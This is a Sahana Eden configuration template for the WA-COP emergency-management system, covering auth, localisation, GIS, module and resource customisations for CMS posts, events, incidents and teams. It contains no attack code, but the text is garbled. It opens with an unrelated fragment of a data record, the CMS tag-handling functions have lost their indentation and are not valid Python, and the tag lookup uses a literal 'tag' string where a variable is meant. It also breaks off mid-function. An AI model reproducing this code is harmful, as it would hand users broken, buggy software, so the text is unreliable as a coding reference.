'from time import time\n'), ((2789, 2795), 'time.time', 'time', ([], {}), '()\n', (2793, 2795), False, 'from time import time\n')] |
# -*- coding: utf-8 -*-
from collections import OrderedDict
from gluon import current
from gluon.storage import Storage
def config(settings):
    """
        Template for WA-COP + CAD Cloud Integration

        Applies all deployment settings for this template (base system,
        auth/registration, security policy, L10n, GIS, enabled modules,
        CMS options) to the given settings object; the customise_* hooks
        defined further down are registered on the same object.
    """
    T = current.T
    # =========================================================================
    # System Settings
    #
    settings.base.system_name = T("Sahana: Washington Common Operating Picture (WA-COP)")
    settings.base.system_name_short = T("Sahana")
    # Prepop default
    settings.base.prepopulate += ("WACOP", "default/users", "WACOP/Demo")
    # Theme (folder to use for views/layout.html)
    settings.base.theme = "WACOP"
    settings.ui.social_buttons = True
    # -------------------------------------------------------------------------
    # Self-Registration and User Profile
    #
    # Users cannot self-register (accounts are created by admins)
    settings.security.self_registration = False
    # Users need to verify their email
    settings.auth.registration_requires_verification = True
    # Users need to be approved
    settings.auth.registration_requires_approval = True
    settings.auth.registration_requests_organisation = True
    settings.auth.registration_organisation_required = True
    # Approval emails get sent to all admins
    settings.mail.approver = "ADMIN"
    settings.auth.registration_link_user_to = {"staff": T("Staff")}
    settings.auth.registration_link_user_to_default = ["staff"]
    settings.auth.registration_roles = {"organisation_id": ["USER"],
                                        }
    settings.auth.show_utc_offset = False
    settings.auth.show_link = False
    # -------------------------------------------------------------------------
    # Security Policy
    #
    settings.security.policy = 7 # Apply Controller, Function and Table ACLs
    settings.security.map = True
    # -------------------------------------------------------------------------
    # L10n (Localization) settings
    #
    settings.L10n.languages = OrderedDict([
        ("en", "English"),
        ("es", "Español"),
    ])
    # Default Language
    settings.L10n.default_language = "en"
    # Default timezone for users
    settings.L10n.utc_offset = "-0800"
    # Unsortable 'pretty' date format
    settings.L10n.date_format = "%b %d %Y"
    # Number formats (defaults to ISO 31-0)
    # Decimal separator for numbers (defaults to ,)
    settings.L10n.decimal_separator = "."
    # Thousands separator for numbers (defaults to space)
    settings.L10n.thousands_separator = ","
    # Default Country Code for telephone numbers
    settings.L10n.default_country_code = 1
    # Enable this to change the label for 'Mobile Phone'
    settings.ui.label_mobile_phone = "Cell Phone"
    # Enable this to change the label for 'Postcode'
    settings.ui.label_postcode = "ZIP Code"
    settings.msg.require_international_phone_numbers = False
    # PDF to Letter
    settings.base.paper_size = T("Letter")
    # Uncomment this to Translate CMS Series Names
    # - we want this on when running s3translate but off in normal usage as we use the English names to lookup icons in render_posts
    #settings.L10n.translate_cms_series = True
    # Uncomment this to Translate Location Names
    #settings.L10n.translate_gis_location = True
    # Has scalability issues, but should be OK with our number of records
    settings.search.dates_auto_range = True
    # -------------------------------------------------------------------------
    # GIS settings
    #
    # Restrict the Location Selector to just certain countries
    settings.gis.countries = ("US",)
    # Levels for the LocationSelector
    # NOTE(review): 'levels' is assigned but not referenced in this function
    levels = ("L1", "L2", "L3")
    # Uncomment to pass Addresses imported from CSV to a Geocoder to try and automate Lat/Lon
    #settings.gis.geocode_imported_addresses = "google"
    # Until we add support to S3LocationSelector to set dropdowns from LatLons
    settings.gis.check_within_parent_boundaries = False
    # GeoNames username
    settings.gis.geonames_username = "mcop"
    # Uncomment to hide Layer Properties tool
    #settings.gis.layer_properties = False
    # Uncomment to display the Map Legend as a floating DIV
    settings.gis.legend = "float"
    # Uncomment to prevent showing LatLon in Location Represents
    settings.gis.location_represent_address_only = "icon"
    # Resources which can be directly added to the main map
    settings.gis.poi_create_resources = None
    # -------------------------------------------------------------------------
    # Modules
    #
    settings.modules = OrderedDict([
        # Core modules which shouldn't be disabled
        ("default", Storage(
            name_nice = "Home",
            restricted = False, # Use ACLs to control access to this module
            access = None, # All Users (inc Anonymous) can see this module in the default menu & access the controller
            module_type = None # This item is not shown in the menu
        )),
        ("admin", Storage(
            name_nice = "Administration",
            #description = "Site Administration",
            restricted = True,
            access = "|1|", # Only Administrators can see this module in the default menu & access the controller
            module_type = None # This item is handled separately for the menu
        )),
        ("appadmin", Storage(
            name_nice = "Administration",
            #description = "Site Administration",
            restricted = True,
            module_type = None # No Menu
        )),
        # ("errors", Storage(
        #     name_nice = "Ticket Viewer",
        #     #description = "Needed for Breadcrumbs",
        #     restricted = False,
        #     module_type = None # No Menu
        # )),
        ("sync", Storage(
            name_nice = "Synchronization",
            #description = "Synchronization",
            restricted = True,
            access = "|1|", # Only Administrators can see this module in the default menu & access the controller
            module_type = None # This item is handled separately for the menu
        )),
        #("translate", Storage(
        #    name_nice = "Translation Functionality",
        #    #description = "Selective translation of strings based on module.",
        #    module_type = None,
        #)),
        ("gis", Storage(
            name_nice = "Map",
            #description = "Situation Awareness & Geospatial Analysis",
            restricted = True,
            module_type = 1, # 1st item in the menu
        )),
        ("pr", Storage(
            name_nice = "Persons",
            description = "Central point to record details on People",
            restricted = True,
            access = "|1|", # Only Administrators can see this module in the default menu (access to controller is possible to all still)
            module_type = None
        )),
        ("org", Storage(
            name_nice = "Organizations",
            #description = 'Lists "who is doing what & where". Allows relief agencies to coordinate their activities',
            restricted = True,
            module_type = 10
        )),
        # All modules below here should be possible to disable safely
        ("hrm", Storage(
            name_nice = "Contacts",
            #description = "Human Resources Management",
            restricted = True,
            module_type = None,
        )),
        ("cms", Storage(
            name_nice = "Content Management",
            restricted = True,
            module_type = 10,
        )),
        ("event", Storage(
            name_nice = "Events",
            restricted = True,
            module_type = 2,
        )),
        ("fire", Storage(
            name_nice = "Fire",
            restricted = True,
            module_type = None,
        )),
        ("police", Storage(
            name_nice = "Police",
            restricted = True,
            module_type = None,
        )),
        ("project", Storage(
            name_nice = "Tasks",
            restricted = True,
            module_type = None,
        )),
        ("doc", Storage(
            name_nice = "Documents",
            #description = "A library of digital resources, such as photos, documents and reports",
            restricted = True,
            module_type = None,
        )),
        ("stats", Storage(
            name_nice = "Statistics",
            restricted = True,
            module_type = None
        )),
    ])
    # -------------------------------------------------------------------------
    # CMS Content Management
    #
    settings.cms.bookmarks = True
    settings.cms.richtext = True
    settings.cms.show_tags = True
    # -------------------------------------------------------------------------
def cms_post_onaccept(form):
"""
Handle Tags in Create / Update forms
"""
post_id = form.vars.id
db = current.db
s3db = current.s3db
ttable = s3db.cms_tag
ltable = s3db.cms_tag_post
# Delete all existing tags for this post
db(ltable.post_id == post_id).delete()
# Add these tags
tags = current.request.post_vars.get("tags")
if not tags:
return
tags = tags.split(",")
tag_ids = db(ttable.name.belongs(tags)).select(ttable.id,
ttable.name).as_dict(key="name")
for tag in tags:
row = tag_ids.get("tag")
if row:
tag_id = row.get("id")
else:
tag_id = ttable.insert(name=tag)
ltable.insert(post_id = post_id,
tag_id = tag_id,
)
# -------------------------------------------------------------------------
def customise_cms_post_resource(r, tablename):
db = current.db
s3db = current.s3db
table = s3db.cms_post
table.priority.readable = table.priority.writable = True
table.series_id.readable = table.series_id.writable = True
table.status_id.readable = table.status_id.writable = True
method = r.method
if method in ("create", "update"):
# Custom Form
from s3 import S3SQLCustomForm, S3SQLInlineComponent
crud_fields = [(T("Type"), "series_id"),
(T("Priority"), "priority"),
(T("Status"), "status_id"),
(T("Title"), "title"),
(T("Text"), "body"),
(T("Location"), "location_id"),
# Tags are added client-side
S3SQLInlineComponent("document",
name = "file",
label = T("Files"),
fields = [("", "file"),
#"comments",
],
),
]
if r.tablename != "event_incident":
if r.tablename == "event_event":
from gluon import IS_EMPTY_OR
from s3 import IS_ONE_OF
itable = s3db.event_incident
query = (itable.event_id == r.id) & \
(itable.closed == False) & \
(itable.deleted == False)
set = db(query)
f = s3db.event_post.incident_id
f.requires = IS_EMPTY_OR(
IS_ONE_OF(set, "event_incident.id",
f.represent,
orderby="event_incident.name",
sort=True))
crud_fields.insert(0, S3SQLInlineComponent("incident_post",
fields = [("", "incident_id")],
label = T("Incident"),
multiple = False,
))
crud_form = S3SQLCustomForm(*crud_fields
)
# Client support for Tags
appname = r.application
s3 = current.response.s3
scripts_append = s3.scripts.append
if s3.debug:
scripts_append("/%s/static/scripts/tag-it.js" % appname)
else:
scripts_append("/%s/static/scripts/tag-it.min.js" % appname)
scripts_append("/%s/static/themes/WACOP/js/update_tags.js" % appname)
if method == "create":
s3.jquery_ready.append('''wacop_update_tags("")''')
elif method == "update":
ttable = s3db.cms_tag
ltable = s3db.cms_tag_post
if r.tablename == "cms_post":
post_id = r.id
else:
post_id = r.component.id
query = (ltable.post_id == post_id) & \
(ltable.tag_id == ttable.id)
tags = db(query).select(ttable.name)
tags = [tag.name for tag in tags]
tags = ",".join(tags)
s3.jquery_ready.append('''wacop_update_tags("%s")''' % tags)
# Processing Tags
default = s3db.get_config(tablename, "onaccept")
if isinstance(default, list):
onaccept = default
onaccept.append(cms_post_onaccept)
else:
onaccept = [default, cms_post_onaccept]
s3db.configure(tablename,
crud_form = crud_form,
onaccept = onaccept,
)
elif method in ("custom", "datalist", "filter"):
# dataList configuration
from templates.WACOP.controllers import cms_post_list_layout
s3 = current.response.s3
s3.dl_no_header = True
s3db.configure(tablename,
list_fields = ["series_id",
"priority",
"status_id",
"date",
"title",
"body",
"created_by",
"tag.name",
"document.file",
"comment.id",
#"comment.body", # Extra fields come in unsorted, so can't match up to records
#"comment.created_by",
#"comment.created_on",
],
list_layout = cms_post_list_layout,
# Default
#orderby = "cms_post.date desc",
)
if method in ("custom", "filter"):
# Filter Widgets
from s3 import S3DateFilter, \
S3LocationFilter, \
S3OptionsFilter, \
S3TextFilter
if method == "filter":
# Apply filter_vars
get_vars = r.get_vars
for k, v in get_vars.iteritems():
# We only expect a maximum of 1 of these, no need to append
from s3 import FS
s3.filter = (FS(k) == v)
date_filter = S3DateFilter("date",
# If we introduce an end_date on Posts:
#["date", "end_date"],
label = "",
#hide_time = True,
slider = True,
clear_text = "X",
)
date_filter.input_labels = {"ge": "Start Time/Date", "le": "End Time/Date"}
from templates.WACOP.controllers import text_filter_formstyle
filter_widgets = [S3TextFilter(["body",
],
formstyle = text_filter_formstyle,
label = T("Search"),
_placeholder = T("Enter search term…"),
),
S3OptionsFilter("series_id",
label = "",
noneSelectedText = "Type", # T() added in widget
no_opts = "",
),
S3OptionsFilter("priority",
label = "",
noneSelectedText = "Priority", # T() added in widget
no_opts = "",
),
S3OptionsFilter("status_id",
label = "",
noneSelectedText = "Status", # T() added in widget
no_opts = "",
),
S3OptionsFilter("created_by$organisation_id",
label = "",
noneSelectedText = "Source", # T() added in widget
no_opts = "",
),
S3OptionsFilter("tag_post.tag_id",
label = "",
noneSelectedText = "Tag", # T() added in widget
no_opts = "",
),
date_filter,
]
if r.tablename == "event_event" or \
(method == "filter" and get_vars.get("event_post.event_id")):
# Event Profile
filter_widgets.insert(1, S3OptionsFilter("incident_post.incident_id",
label = "",
noneSelectedText = "Incident", # T() added in widget
no_opts = "",
))
user = current.auth.user
if user:
filter_widgets.insert(1, S3OptionsFilter("bookmark.user_id",
label = "",
options = {"*": T("All"),
user.id: T("My Bookmarks"),
},
cols = 2,
multiple = False,
table = False,
))
s3db.configure(tablename,
filter_widgets = filter_widgets,
)
settings.customise_cms_post_resource = customise_cms_post_resource
    # -------------------------------------------------------------------------
    # Event/Incident Management
    #
    settings.event.incident_teams_tab = "Units"
    # Uncomment to preserve linked Incidents when an Event is deleted
    settings.event.cascade_delete_incidents = False
    # -------------------------------------------------------------------------
    def customise_event_event_resource(r, tablename):
        """
            Customise the event_event resource: adds virtual fields
            (clickable name, status, incident/resource counts, tags)
            and the list_fields/orderby for event lists.

            @param r: the S3Request
            @param tablename: "event_event"
        """
        from gluon import A, URL
        from s3 import s3_fieldmethod
        db = current.db
        s3db = current.s3db
        # Virtual Fields
        etable = s3db.event_event
        #append = etable._virtual_methods.append
        def event_name(row):
            # Event name as link to the custom profile page
            return A(row["event_event.name"],
                     _href = URL(c="event", f="event",
                                args=[row["event_event.id"], "custom"],
                                extension = "", # ensure no .aadata
                                ),
                     )
        #append(Field.Method("name_click", event_name))
        etable.name_click = s3_fieldmethod("name_click",
                                           event_name,
                                           # over-ride the default represent of s3_unicode to prevent HTML being rendered too early
                                           represent = lambda v: v,
                                           )
        def event_status(row):
            # Status derived from exercise-flag and end_date
            if row["event_event.exercise"]:
                status = T("Testing")
            elif not row["event_event.end_date"]:
                status = T("Open")
            else:
                status = T("Closed")
            return status
        #append(Field.Method("status", event_status))
        etable.status = s3_fieldmethod("status", event_status)
        itable = s3db.event_incident
        def event_incidents(row):
            # Count of undeleted Incidents linked to this Event
            query = (itable.event_id == row["event_event.id"]) & \
                    (itable.deleted == False)
            incidents = db(query).count()
            return incidents
        #append(Field.Method("incidents", event_incidents))
        etable.incidents = s3_fieldmethod("incidents", event_incidents)
        ertable = s3db.event_team
        def event_resources(row):
            # Count of undeleted Teams linked to this Event
            query = (ertable.event_id == row["event_event.id"]) & \
                    (ertable.deleted == False)
            resources = db(query).count()
            return resources
        #append(Field.Method("resources", event_resources))
        etable.resources = s3_fieldmethod("resources", event_resources)
        ettable = s3db.event_tag
        ttable = s3db.cms_tag
        def event_tags(row):
            # Comma-separated list of this Event's tag names
            query = (ettable.event_id == row["event_event.id"]) & \
                    (ettable.deleted == False) & \
                    (ettable.tag_id == ttable.id)
            tags = db(query).select(ttable.name)
            if tags:
                tags = [t.name for t in tags]
                tags = ", ".join(tags)
                return tags
            else:
                return current.messages["NONE"]
        #append(Field.Method("tags", event_tags))
        etable.tags = s3_fieldmethod("tags", event_tags)
        list_fields = [(T("Name"), "name_click"),
                       (T("Status"), "status"),
                       (T("Zero Hour"), "start_date"),
                       (T("Closed"), "end_date"),
                       (T("City"), "location.location_id.L3"),
                       (T("State"), "location.location_id.L1"),
                       (T("Tags"), "tags"),
                       (T("Incidents"), "incidents"),
                       (T("Resources"), "resources"),
                       ]
        s3db.configure(tablename,
                       # extra_fields are needed by the virtual field methods
                       extra_fields = ("name",
                                       "end_date",
                                       "exercise",
                                       ),
                       list_fields = list_fields,
                       orderby = "event_event.name",
                       )
    settings.customise_event_event_resource = customise_event_event_resource
    # -------------------------------------------------------------------------
    def customise_event_event_controller(**attr):
        """
            Customise the event/event controller: single-location
            component, custom browse/profile methods, custom prep
            (task forms, popup list tweaks) and the WACOP rheader.

            @param attr: controller attributes (dict)
            @return: the updated attr dict
        """
        s3db = current.s3db
        s3 = current.response.s3
        # Modify Components
        s3db.add_components("event_event",
                            # Events have just a single Location
                            event_event_location = {"joinby": "event_id",
                                                    "multiple": False,
                                                    },
                            # Incidents are linked to Events, not created from them
                            # - not a link table though, so can't change the actuation
                            #event_incident = {"joinby": "event_id",
                            #                  },
                            )
        # Custom Browse
        from templates.WACOP.controllers import event_Browse, event_Profile
        set_method = s3db.set_method
        set_method("event", "event",
                   method = "browse",
                   action = event_Browse)
        # Custom Profile
        set_method("event", "event",
                   method = "custom",
                   action = event_Profile)
        # Custom prep
        standard_prep = s3.prep
        def custom_prep(r):
            # Call standard prep first (result is ignored)
            if callable(standard_prep):
                result = standard_prep(r)
            cname = r.component_name
            if not cname:
                # Main record: hide the event type selector
                f = s3db.event_event.event_type_id
                f.readable = f.writable = False
            elif cname == "task":
                from gluon import IS_EMPTY_OR
                from s3 import IS_ONE_OF, S3SQLCustomForm, S3SQLInlineComponent
                itable = s3db.event_incident
                # Limit selectable incidents to open ones of this event
                query = (itable.event_id == r.id) & \
                        (itable.closed == False) & \
                        (itable.deleted == False)
                set = current.db(query)
                f = s3db.event_task.incident_id
                f.requires = IS_EMPTY_OR(
                                IS_ONE_OF(set, "event_incident.id",
                                          f.represent,
                                          orderby="event_incident.name",
                                          sort=True))
                crud_form = S3SQLCustomForm(
                                S3SQLInlineComponent("incident",
                                                     fields = [("", "incident_id")],
                                                     label = T("Incident"),
                                                     multiple = False,
                                                     filterby = dict(field = "event_id",
                                                                     options = r.id,
                                                                     )
                                                     ),
                                "name",
                                "description",
                                "source",
                                "priority",
                                "pe_id",
                                "date_due",
                                "status",
                                "comments",
                                )
                r.component.configure(crud_form = crud_form,
                                      )
            elif r.representation == "popup" and r.get_vars.get("view"):
                # Popups for lists in Parent Event of Incident Screen or Event Profile header
                # No Title since this is on the Popup
                s3.crud_strings["event_event"].title_display = ""
                # No create button & Tweak list_fields
                if cname == "incident":
                    list_fields = ["date",
                                   "name",
                                   "incident_type_id",
                                   ]
                elif cname == "group":
                    list_fields = ["incident_id",
                                   "group_id",
                                   "status_id",
                                   ]
                elif cname == "post":
                    list_fields = ["date",
                                   "series_id",
                                   "priority",
                                   "status_id",
                                   "body",
                                   ]
                else:
                    # Shouldn't get here but want to avoid crashes
                    list_fields = []
                r.component.configure(insertable = False,
                                      list_fields = list_fields,
                                      )
            return True
        s3.prep = custom_prep
        # Custom rheader tabs
        attr = dict(attr)
        attr["rheader"] = wacop_event_rheader
        return attr
    settings.customise_event_event_controller = customise_event_event_controller
    # -------------------------------------------------------------------------
    def customise_event_incident_resource(r, tablename):
        """
            Customise the event_incident resource: adds virtual fields
            (clickable name, status, and - for the Browse view -
            resource counts and tags) plus list_fields/orderby.

            @param r: the S3Request
            @param tablename: "event_incident"
        """
        from gluon import A, URL
        from s3 import s3_fieldmethod
        s3db = current.s3db
        # Virtual Fields
        itable = s3db.event_incident
        #append = itable._virtual_methods.append
        def incident_name(row):
            # Incident name as link to the custom profile page
            return A(row["event_incident.name"],
                     _href = URL(c="event", f="incident",
                                args=[row["event_incident.id"], "custom"],
                                extension = "", # ensure no .aadata
                                ),
                     )
        #append(Field.Method("name_click", incident_name))
        itable.name_click = s3_fieldmethod("name_click",
                                           incident_name,
                                           # over-ride the default represent of s3_unicode to prevent HTML being rendered too early
                                           represent = lambda v: v,
                                           )
        def incident_status(row):
            # Status derived from exercise-flag and end_date
            if row["event_incident.exercise"]:
                status = T("Testing")
            elif not row["event_incident.end_date"]:
                status = T("Open")
            else:
                status = T("Closed")
            return status
        #append(Field.Method("status", incident_status))
        itable.status = s3_fieldmethod("status", incident_status)
        if r.method == "browse" or r.get_vars.get("browse"):
            # Incident Browse
            db = current.db
            ertable = s3db.event_team
            def incident_resources(row):
                # Count of undeleted Teams linked to this Incident
                # NOTE(review): filters ertable.event_id by the incident's
                # id - confirm this should not be ertable.incident_id
                query = (ertable.event_id == row["event_incident.id"]) & \
                        (ertable.deleted == False)
                resources = db(query).count()
                return resources
            #append(Field.Method("resources", incident_resources))
            itable.resources = s3_fieldmethod("resources", incident_resources)
            ettable = s3db.event_tag
            ttable = s3db.cms_tag
            def incident_tags(row):
                # Comma-separated list of this Incident's tag names
                query = (ettable.incident_id == row["event_incident.id"]) & \
                        (ettable.deleted == False) & \
                        (ettable.tag_id == ttable.id)
                tags = db(query).select(ttable.name)
                if tags:
                    tags = [t.name for t in tags]
                    tags = ", ".join(tags)
                    return tags
                else:
                    return current.messages["NONE"]
            #append(Field.Method("tags", incident_tags))
            itable.tags = s3_fieldmethod("tags", incident_tags)
            list_fields = [(T("Name"), "name_click"),
                           (T("Status"), "status"),
                           (T("Type"), "incident_type_id"),
                           (T("Zero Hour"), "date"),
                           (T("Closed"), "end_date"),
                           (T("City"), "location.location_id.L3"),
                           (T("State"), "location.location_id.L1"),
                           (T("Tags"), "tags"),
                           (T("Resources"), "resources"),
                           (T("Event"), "event_id"),
                           ]
        else:
            # Homepage or Event Profile
            list_fields = [(T("Name"), "name_click"),
                           (T("Status"), "status"),
                           (T("Type"), "incident_type_id"),
                           "location_id",
                           (T("Start"), "date"),
                           ]
        s3db.configure(tablename,
                       # extra_fields are needed by the virtual field methods
                       extra_fields = ("name",
                                       "end_date",
                                       "exercise",
                                       ),
                       list_fields = list_fields,
                       orderby = "event_incident.name",
                       )
    settings.customise_event_incident_resource = customise_event_incident_resource
    # -------------------------------------------------------------------------
    def customise_event_incident_controller(**attr):
        """
            Customise the event/incident controller: custom
            browse/profile methods, custom prep (task/popup forms)
            and postp (assign view), no rheader or sidebar menu.

            @param attr: controller attributes (dict)
            @return: the updated attr dict
        """
        s3db = current.s3db
        response = current.response
        s3 = response.s3
        # Load normal model to be able to override configuration
        table = s3db.event_incident
        table.event_id.readable = table.event_id.writable = True
        # Custom Browse
        from templates.WACOP.controllers import incident_Browse, incident_Profile
        set_method = s3db.set_method
        set_method("event", "incident",
                   method = "browse",
                   action = incident_Browse)
        # Custom Profile
        set_method("event", "incident",
                   method = "custom",
                   action = incident_Profile)
        #s3.crud_strings["event_incident"].title_list = T("Browse Incidents")
        # Custom prep
        standard_prep = s3.prep
        def custom_prep(r):
            # Call standard prep first (result is ignored)
            if callable(standard_prep):
                result = standard_prep(r)
            if r.method == "assign":
                # Hide the top menu in the assign popup
                current.menu.main = ""
            elif r.component_name == "task":
                from s3 import S3SQLCustomForm
                crud_form = S3SQLCustomForm("name",
                                            "description",
                                            "source",
                                            "priority",
                                            "pe_id",
                                            "date_due",
                                            "status",
                                            "comments",
                                            )
                r.component.configure(crud_form = crud_form,
                                      )
            elif r.representation == "popup":
                if not r.component:
                    if r.get_vars.get("set_event"):
                        # Popup just used to link to Event
                        #s3.crud_strings["event_incident"].title_update = T("Add to Event")
                        from s3 import S3SQLCustomForm
                        crud_form = S3SQLCustomForm("event_id",
                                                    )
                        s3db.configure("event_incident",
                                       crud_form = crud_form,
                                       )
                #elif r.component_name == "post":
                #    from s3 import S3SQLCustomForm
                #    crud_form = S3SQLCustomForm("body",
                #                                )
                #    s3db.configure("cms_post",
                #                   crud_form = crud_form,
                #                   )
            return True
        s3.prep = custom_prep
        # Custom postp
        standard_postp = s3.postp
        def custom_postp(r, output):
            # Call standard postp
            if callable(standard_postp):
                output = standard_postp(r, output)
            if r.interactive and isinstance(output, dict):
                if r.method == "assign":
                    # No Top Menu
                    current.menu.main = ""
                    # Custom View to waste less space inside popup
                    import os
                    response.view = os.path.join(r.folder,
                                                 "modules", "templates",
                                                 "WACOP", "views",
                                                 "assign.html")
                #elif r.component_name == "post":
                #    # Add Tags - no, do client-side
                #    output["form"].append()
                #else:
                #    # Summary or Profile pages
                #    # Additional styles
                #    s3.external_stylesheets += ["https://cdn.knightlab.com/libs/timeline3/latest/css/timeline.css",
                #                                "https://fonts.googleapis.com/css?family=Merriweather:400,700|Source+Sans+Pro:400,700",
                #                                ]
                #if r.method == "summary":
                #    # Open the Custom profile page instead of the normal one
                #    from gluon import URL
                #    from s3 import S3CRUD
                #    custom_url = URL(args = ["[id]", "custom"])
                #    S3CRUD.action_buttons(r,
                #                          read_url=custom_url,
                #                          update_url=custom_url)
                # # System-wide Alert
                # from templates.WACOP.controllers import custom_WACOP
                # custom = custom_WACOP()
                # output["system_wide"] = custom._system_wide_html()
            return output
        s3.postp = custom_postp
        # Custom rheader tabs
        #attr = dict(attr)
        #attr["rheader"] = wacop_event_rheader
        attr["rheader"] = None
        # No sidebar menu
        current.menu.options = None
        return attr
    settings.customise_event_incident_controller = customise_event_incident_controller
    # -------------------------------------------------------------------------
    def customise_event_human_resource_resource(r, tablename):
        """
            Customise the event_human_resource resource: clickable name
            virtual field plus list_fields, for use within an Event or
            Incident context.

            @param r: the S3Request (r.function/r.id give the context)
            @param tablename: "event_human_resource"
        """
        from gluon import A, URL
        from s3 import s3_fieldmethod
        s3db = current.s3db
        # Virtual Fields
        # Always used from either the Event or Incident context
        f = r.function
        record_id = r.id
        ehrtable = s3db.event_human_resource
        hr_represent = ehrtable.human_resource_id.represent
        def hr_name(row):
            # Represented HR name as link to the profile within the context record
            hr_id = row["event_human_resource.human_resource_id"]
            return A(hr_represent(hr_id),
                     _href = URL(c="event", f=f,
                                args=[record_id, "human_resource", hr_id, "profile"],
                                ),
                     )
        ehrtable.name_click = s3_fieldmethod("name_click",
                                             hr_name,
                                             # over-ride the default represent of s3_unicode to prevent HTML being rendered too early
                                             # @ToDo: Bulk lookups
                                             represent = lambda v: v,
                                             )
        s3db.configure(tablename,
                       #crud_form = crud_form,
                       extra_fields = ("human_resource_id",
                                       ),
                       list_fields = [(T("Name"), "name_click"),
                                      (T("Title"), "human_resource_id$job_title_id"),
                                      "human_resource_id$organisation_id",
                                      (T("Email"), "human_resource_id$person_id$email.value"),
                                      (T("Phone"), "human_resource_id$person_id$phone.value"),
                                      "status",
                                      (T("Notes"), "comments"),
                                      ],
                       orderby = "event_human_resource.human_resource_id",
                       )
    settings.customise_event_human_resource_resource = customise_event_human_resource_resource
    # -------------------------------------------------------------------------
    def customise_event_organisation_resource(r, tablename):
        """
            Customise the event_organisation resource: clickable name
            virtual field plus list_fields, for use within an Event or
            Incident context.

            @param r: the S3Request (r.function/r.id give the context)
            @param tablename: "event_organisation"
        """
        from gluon import A, URL
        from s3 import s3_fieldmethod
        s3db = current.s3db
        # Virtual Fields
        # Always used from either the Event or Incident context
        f = r.function
        record_id = r.id
        eotable = s3db.event_organisation
        org_represent = eotable.organisation_id.represent
        def org_name(row):
            # Represented Org name as link to the profile within the context record
            organisation_id = row["event_organisation.organisation_id"]
            return A(org_represent(organisation_id),
                     _href = URL(c="event", f=f,
                                args=[record_id, "organisation", organisation_id, "profile"],
                                ),
                     )
        eotable.name_click = s3_fieldmethod("name_click",
                                            org_name,
                                            # over-ride the default represent of s3_unicode to prevent HTML being rendered too early
                                            # @ToDo: Bulk lookups
                                            represent = lambda v: v,
                                            )
        s3db.configure(tablename,
                       #crud_form = crud_form,
                       extra_fields = ("organisation_id",
                                       ),
                       list_fields = [(T("Name"), "name_click"),
                                      "status",
                                      "comments",
                                      ],
                       orderby = "event_organisation.organisation_id",
                       )
    settings.customise_event_organisation_resource = customise_event_organisation_resource
    # -------------------------------------------------------------------------
    def customise_event_team_resource(r, tablename):
        """
            Customise the event_team resource: custom CRUD form and a
            clickable group-name virtual field, for use within an Event
            or Incident context.

            @param r: the S3Request (r.function/r.id give the context)
            @param tablename: "event_team"
        """
        from gluon import A, URL
        from s3 import s3_fieldmethod, S3SQLCustomForm
        s3db = current.s3db
        ertable = s3db.event_team
        #sertable.group_id.label = T("Resource")
        # Form
        # @ToDo: Have both Team & Event_Team in 1 form
        crud_form = S3SQLCustomForm("incident_id",
                                    "group_id",
                                    "status_id",
                                    )
        # Virtual Fields
        # Always used from either the Event or Incident context
        f = r.function
        record_id = r.id
        group_represent = ertable.group_id.represent
        def team_name(row):
            # Represented Group name as link to the profile within the context record
            group_id = row["event_team.group_id"]
            return A(group_represent(group_id),
                     _href = URL(c="event", f=f,
                                args=[record_id, "group", group_id, "profile"],
                                extension = "", # ensure no .aadata
                                ),
                     )
        ertable.name_click = s3_fieldmethod("name_click",
                                            team_name,
                                            # over-ride the default represent of s3_unicode to prevent HTML being rendered too early
                                            # @ToDo: Bulk lookups
                                            represent = lambda v: v,
                                            )
        s3db.configure(tablename,
                       crud_form = crud_form,
                       extra_fields = ("group_id",
                                       ),
                       list_fields = [(T("Name"), "name_click"),
                                      "status_id",
                                      ],
                       orderby = "pr_group.name",
                       )
    settings.customise_event_team_resource = customise_event_team_resource
    # -------------------------------------------------------------------------
    def customise_pr_group_resource(r, tablename):
        """
            Customise the pr_group resource: relabel Groups as
            "Resources", enable the status field and set the CRUD
            form / list_fields accordingly.

            @param r: the S3Request
            @param tablename: "pr_group"
        """
        s3db = current.s3db
        # Relabel Groups as "Resources" in all CRUD strings
        current.response.s3.crud_strings[tablename] = Storage(
            label_create = T("Create Resource"),
            title_display = T("Resource Details"),
            title_list = T("Resources"),
            title_update = T("Edit Resource"),
            label_list_button = T("List Resources"),
            label_delete_button = T("Delete Resource"),
            msg_record_created = T("Resource added"),
            msg_record_modified = T("Resource updated"),
            msg_record_deleted = T("Resource deleted"),
            msg_list_empty = T("No Resources currently registered"))
        field = s3db.pr_group.status_id
        field.readable = field.writable = True
        from s3 import S3SQLCustomForm
        crud_form = S3SQLCustomForm((T("Name"), "name"),
                                    "status_id",
                                    "comments",
                                    )
        list_fields = [(T("Name"), "name"),
                       "status_id",
                       "comments",
                       ]
        s3db.configure(tablename,
                       crud_form = crud_form,
                       list_fields = list_fields,
                       )
    settings.customise_pr_group_resource = customise_pr_group_resource
    # -------------------------------------------------------------------------
    def customise_pr_person_controller(**attr):
        """
            Customise the pr/person controller: register the custom
            WACOP dashboard method and hide the sidebar menu.

            @param attr: controller attributes (dict)
            @return: the (unmodified) attr dict
        """
        # Custom Profile
        from templates.WACOP.controllers import person_Dashboard
        current.s3db.set_method("pr", "person",
                                method = "dashboard",
                                action = person_Dashboard)
        # No sidebar menu
        current.menu.options = None
        return attr
    settings.customise_pr_person_controller = customise_pr_person_controller
    # -------------------------------------------------------------------------
    def customise_project_task_resource(r, tablename):
        """
            Customise the project_task resource: clickable task-name
            virtual field plus list_fields, for use within an Event or
            Incident context.

            @param r: the S3Request (r.function/r.id give the context)
            @param tablename: "project_task"
        """
        from gluon import A, URL
        from s3 import s3_fieldmethod
        s3db = current.s3db
        # Virtual Fields
        # Always used from either the Event or Incident context
        f = r.function
        record_id = r.id
        def task_name(row):
            # Task name as link to the profile within the context record
            return A(row["project_task.name"],
                     _href = URL(c="event", f=f,
                                args=[record_id, "task", row["project_task.id"], "profile"],
                                ),
                     )
        s3db.project_task.name_click = s3_fieldmethod("name_click",
                                                      task_name,
                                                      # over-ride the default represent of s3_unicode to prevent HTML being rendered too early
                                                      represent = lambda v: v,
                                                      )
        s3db.configure(tablename,
                       #crud_form = crud_form,
                       extra_fields = ("name",
                                       ),
                       list_fields = ["status",
                                      (T("Description"), "name_click"),
                                      (T("Created"), "created_on"),
                                      (T("Due"), "date_due"),
                                      ],
                       orderby = "project_task.date_due",
                       )
    settings.customise_project_task_resource = customise_project_task_resource
# =============================================================================
def wacop_event_rheader(r, tabs=None):
    """
        EVENT custom resource headers

        @param r: the S3Request
        @param tabs: optional list of (title, component) tuples to
                     override the default tabs
        @return: the rheader DIV, or None for non-HTML representations
                 or when there is no record
    """
    if r.representation != "html":
